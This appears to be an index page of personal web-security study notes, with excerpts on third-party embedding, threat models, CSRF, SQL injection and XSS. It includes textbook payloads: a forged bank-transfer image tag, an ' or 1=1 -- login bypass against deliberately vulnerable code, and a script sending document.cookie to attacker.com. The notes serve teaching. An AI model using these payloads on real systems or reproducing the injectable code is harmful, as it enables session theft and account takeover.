11. Web Security

Dated Nov 21, 2018; last modified on Sat, 27 Mar 2021

		Random Link ¯\_(ツ)_/¯
Nov 21, 2018	»	Web Applications 101 2 min; updated Mar 14, 2021 How does a page embed content from other domains? Method 1: Loading a third party script that modifies the page. `<html> <!-- Page Content --> <div id="widget"></div> <script src="https://third-party.com/widget.js"></script> </html>` Method 2: Loading a third party resource in an iframe. `<html> <!-- Page Content --> <iframe src="https://third-party.com/widget.js"></iframe> </html>` How do you stay logged in w/o re-entering password? HTTP cookies! Alice’s browser sends a `GET` request to `http://www.example.com/`. `http://www.example.com` responds with a `Set-Cookie` instruction containing a token representing the logged in state, e.g. `session-id=...`. Whenever Alice visits a page at `www.example.com`, the browser sends the `session-id` cookie with the request. How does DoubleClick track users from site to site? Third-party cookies ...
Nov 21, 2018	»	02. Threat Models for Web Security 1 min; updated Mar 14, 2021 #1: Network Adversary Addressed by secure communication protocols (+ network security) #2: User visits adversary’s page Variants: Attacker gets the user to click a link, e.g. one that adds an item to their shopping cart. Attacker gets the user’s browser to request a link #3: Adversary is a third-party `<iframe src="https://third-party.com/widget"></iframe>` Note that an adversary script being embedded directly, e.g. through a `<script>` tag is not a threat model! #4: Adversary interacts with the server
Nov 21, 2018	»	03. Cross-Site Request Forgery (XSRF) 2 min; updated Sep 5, 2022 Cross-site Request Forgery (XSRF) `<img src="http://bank.com/transfer?from=from_ID&to=to_ID&value=1000">` Because the user is logged in and has a cookie, the victim site trusts the user’s browser. The attacker gets user/browser to execute command on victim site, e.g. request a link, post a form. The command has permanent effects. A frame can navigate its immediate children. Why is it designed such that it can’t navigate its children too? Consider a website with a login frame, where the user inputs passwords. The attacker can put this website inside a frame and navigate to the login frame and steal passwords. ...
Nov 25, 2018	»	SQL Injection 1 min; updated Mar 14, 2021 In a SQL injection attack, the attacker provides malicious form input that is fed into a DB server. Outcomes may include data deletion, bypassing access control, etc. Sample Buggy Login Server side code: `results = db.execute( "SELECT * FROM Users WHERE user='" + form["user"] + "' " + "AND pwd='" + form["pwd"] + "'") if results: login(results) else: login_failed(form)` An attacker can supply `' or 1=1 --` as the value for `user`. This will make the effective code be: `results = db.execute("SELECT * FROM Users WHERE user='' OR 1=1 -- ' AND pwd='')` `--` is a comment, which makes the rest of the command be ignored. The expression always returns true and thus the adversary bypasses the authorization check.
Nov 21, 2018	»	Cross-Site Scripting (XSS) 2 min; updated Mar 14, 2021 XSS 101 Suppose a site, given a non-existent path, e.g. `htpp://victim.com/path`, writes this error message: Error 404! `path` not found. An attacker can then lead a user to opening `http://victim.com/attacker_supplied_string`, where `attacker_supplied_string` is: <script> let addr = "http://attacker.com/?" + escape(document.cookie); document.write(`<img src="${addr}" />`); </script> Suppose a site uses Force HTTPS. If a `<script src="http://...">` is not redirected to a HTTPS url, then an active attacker would still replace the JS code in the HTTP response with the malicious code that would run on the HTTPS page! ...